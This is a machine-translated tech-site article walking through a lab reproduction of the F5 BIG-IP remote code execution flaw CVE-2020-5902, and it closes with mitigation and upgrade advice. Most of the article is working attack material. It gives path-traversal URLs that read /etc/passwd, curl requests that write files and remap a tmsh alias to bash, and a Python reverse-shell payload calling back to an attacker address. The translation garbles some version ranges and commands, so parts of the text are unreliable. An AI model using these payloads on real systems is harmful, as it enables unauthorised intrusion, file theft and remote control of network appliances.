In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-04-01 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >
Share
Shulou(Shulou.com)05/31 Report--
This article introduces how to achieve F5 BIG-IP remote code execution vulnerability CVE-2020-5902 reproduction, the content is very detailed, interested friends can refer to, hope to be helpful to you.
Introduction to 0x00
F5 BIG-IP is an application delivery platform that integrates traffic management, DNS, inbound and outbound rules, web application firewall, web gateway, load balancing and other functions. A remote code execution vulnerability exists in the traffic management user page (TMUI) / configuration program specific page of the F5 BIG-IP product, resulting in unauthorized access to all functions of the TMUI module, including undisclosed functions, including the execution of arbitrary system commands, arbitrary file reads, arbitrary file writes, enabling / disabling services, and so on.
Overview of 0x02 vulnerabilities
An attacker can exploit this vulnerability to execute arbitrary system commands, create or delete files, disable services, execute arbitrary Java code, and gain full control of the target system by shell.
0x03 scope of influence
F5 BIG-IP 15.1.0
F5 BIG-IP 15.0.0
F5 BIG-IP 14.1.0 Mel 14.1.2
F5 BIG-IP 13.1.0 color 13.1.3
F5 BIG-IP 12.1.0 color 12.1.5
F5 BIG-IP 11.6.1 Mui 11.6.5
0x04 environment building
1. Register on F5 official website and log in to download the trial.
Https://downloads.f5.com/esd/ecc.sv?sw=BIG-IP&pro=big-ip_v15.x&ver=15.1.0&container=Virtual-Edition
two。 Then choose any download area and download it.
3. After the download is complete, use VMware to import the installation
VMware upper left corner 'File'-> 'Open' Select the downloaded file
4. In terms of configuration, you can start the system by default account after import: you need to change the default password after root/default login.
5. Enter config, configure the ip address, and click enter twice.
6. After setting up IP, visit the link and the login page will be installed successfully / / Note to add https and IP
Https://172.16.1.186/tmui/login.jsp
Recurrence of 0x05 vulnerabilities
1. Since the login management page is where the vulnerability exists, we use poc to read the test file:
Https://ip/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
Https://ip/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts
two。 Write to a file
Curl-k-H "Content-Type: application/x-www-form-urlencoded"-X POST-d "fileName=/tmp/success&content= East Tower Network Security Institute"https://172.16.1.200/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp""
3. Read a file
Curl-k "https://172.16.1.200/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/tmp/success"
4. Change alias hijack list command to bash
Curl-k "https://172.16.1.200/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash"
4.1Writing files: bash files
Https://172.16.1.200/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/test&content=id
4.2 execute the bash file
Https://172.16.1.200/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/test
Note: this operation cannot be completed because of insufficient permissions, so you can try it in the real world.
5. Bounce shell, write python bounce shell
Https://172.16.1.200/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/shell&content=python-c "import os,socket,subprocess;s=socket.socket (socket.AF_INET,socket.SOCK_STREAM); s.connect (('172.16.1.132))
Os.dup2 (s.fileno (), 0); os.dup2 (s.fileno (), 1); os.dup2 (s.fileno (), 2); p=subprocess.call (['/ bin/bash','-i']); "
Use kali to monitor
Execute the following command to rebound shell / / No permission. There is no successful bounce here. You can test it in the real environment.
6. Use tools
Https://github.com/theLSA/f5-bigip-rce-cve-2020-5902
Https://github.com/Critical-Start/Team-Ares/tree/master/CVE-2020-5902
0x06 repair recommendation
1. It is officially suggested that the impact can be temporarily mitigated through the following steps (temporary repair scheme)
1.1 Log in to the corresponding system using the following command: tmsh
1.2 Editing the configuration file of the httpd component
Edit / sys httpd all-properties
1.3The contents of the file are as follows: include 'Redirect 404 /'
1.4 Save the file as follows
Press ESC and enter: wq
1.5 execute command to refresh configuration file
Save / sys config
Restart the httpd service.
Restart sys service httpd also forbids external IP from accessing TMUI pages.
2. Upgrade to the following version
BIG-IP 15.x: 15.1.0.4
BIG-IP 14.x: 14.1.2.6
BIG-IP 13.x: 13.1.3.4
BIG-IP 12.x: 12.1.5.2
BIG-IP 11.x: 11.6.5.2
On how to achieve F5 BIG-IP remote code execution vulnerability CVE-2020-5902 reproduction is shared here, I hope the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.